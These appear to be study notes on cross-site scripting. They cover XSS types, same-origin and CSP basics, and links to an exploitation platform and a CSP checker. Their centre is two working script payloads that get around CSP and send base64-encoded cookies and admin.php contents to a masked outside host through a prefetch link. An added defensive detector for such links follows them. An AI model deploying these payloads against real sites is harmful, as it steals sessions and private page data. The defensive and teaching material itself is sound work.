XSS attacks fall into three categories: stored (persistent), reflected (non-persistent), and DOM-based.
<script>alert('XSS')</script>
- XSS without HTML: Client-Side Template Injection with AngularJS (keywords: client-side template injection, AngularJS)
- Online XSS exploitation platform: https://xsspt.com/
- XSS Filter Evasion Cheat Sheet
Same origin: identical protocol, domain and port.
Online CSP checker: https://csp-evaluator.withgoogle.com/
Using <link> to bypass CSP and send the cookie
<script>
// Fetch a same-origin page, then leak cookie + page body through a prefetch
// hint, which CSP did not govern here the way it governs script/img/connect.
$.get("admin.php", function(data){
    var content = window.btoa(document.cookie).concat(window.btoa(data));
    var n0t = document.createElement("link");
    n0t.setAttribute("rel", "prefetch");
    n0t.setAttribute("href", "http://***/".concat(content));
    document.head.appendChild(n0t);
});
</script>
Building on the above, fetching other pages (plain XMLHttpRequest, no jQuery)
<script>
// Minimal GET helper: invoke callback with the response body on success.
getText = function(url, callback)
{
    var request = new XMLHttpRequest();
    request.onreadystatechange = function()
    {
        if (request.readyState == 4 && request.status == 200)
        {
            callback(request.responseText);
        }
    };
    request.open("GET", url);
    request.send();
}
// Encode the fetched body and leak it via a prefetch link.
function mycallback(data) {
    var content = window.btoa(data);
    var n0t = document.createElement("link");
    n0t.setAttribute("rel", "prefetch");
    n0t.setAttribute("href", "http://*****/".concat(content));
    document.head.appendChild(n0t);
}
getText("admin.php", mycallback);
</script>
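As an added example (not part of the original notes), a small detection aid for the channel used above: it flags `<link>` elements whose `rel` is a prefetch-type hint and whose `href` resolves off-origin, with a stronger signal when the path tail looks like the base64 blob the payload appends. `classifyLink` is a pure function (assumed name) that can be unit-tested; `installLinkGuard` wires it to a `MutationObserver` in a browser. Running inside the page it can be tampered with by the same injected script, so treat it as telemetry, not as a replacement for a policy that covers prefetch.

```javascript
// Added example (not from the original notes): spot injected prefetch-style
// links that point off-origin, the exfiltration channel shown above.
const HINT_RELS = new Set(["prefetch", "prerender", "dns-prefetch", "preconnect"]);

// Returns a reason string if the link looks like an off-origin exfil hint,
// otherwise null. pageOrigin is e.g. "https://app.example".
function classifyLink(rel, href, pageOrigin) {
  const rels = String(rel || "").toLowerCase().split(/\s+/);
  if (!rels.some((r) => HINT_RELS.has(r))) return null;   // not a hint link
  let url;
  try { url = new URL(href, pageOrigin); } catch (e) { return "unparseable href"; }
  if (url.origin === pageOrigin) return null;             // same-origin hint is normal
  // The payload above appends btoa(cookie)+btoa(body) as the last path segment.
  const tail = url.pathname.split("/").pop();
  if (/^[A-Za-z0-9+/=]{40,}$/.test(tail)) return "off-origin prefetch with base64-like path";
  return "off-origin prefetch";
}

// Browser wiring: watch the whole document for added <link> nodes,
// report and remove any that classifyLink flags.
function installLinkGuard(doc, win, report) {
  const origin = win.location.origin;
  const check = (el) => {
    const reason = classifyLink(el.getAttribute("rel"), el.getAttribute("href"), origin);
    if (reason) { report({ reason, href: el.getAttribute("href") }); el.remove(); }
  };
  const obs = new win.MutationObserver((muts) => {
    for (const m of muts) for (const n of m.addedNodes)
      if (n.nodeType === 1 && n.tagName === "LINK") check(n);
  });
  obs.observe(doc.documentElement, { childList: true, subtree: true });
  return obs;
}

// Only activate when a DOM is present (no-op under Node).
if (typeof window !== "undefined" && typeof MutationObserver !== "undefined") {
  installLinkGuard(document, window, (e) => console.warn("prefetch guard:", e));
}
```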
- AMP HTML: a CTF write-up on XSS, covering how AMP can be used to obtain cookies